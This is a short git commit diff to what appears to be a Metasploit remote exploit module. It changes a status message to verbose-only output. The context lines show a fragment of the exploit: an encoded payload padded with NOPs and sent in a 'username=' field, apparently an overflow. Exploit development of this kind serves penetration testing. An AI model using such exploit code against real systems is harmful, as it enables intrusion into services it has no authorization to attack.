Minor tweak to use vprint...
parent
e91830efe7
commit
9a6c54840b
|
@ -76,7 +76,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
evil << payload.encoded
|
||||
evil << make_nops(10000 - evil.length)
|
||||
|
||||
print_status("Evil length: " + evil.length.to_s)
|
||||
vprint_status("Evil length: " + evil.length.to_s)
|
||||
|
||||
sploit = "username="
|
||||
sploit << evil
|
||||
|
|
Loading…
Reference in New Issue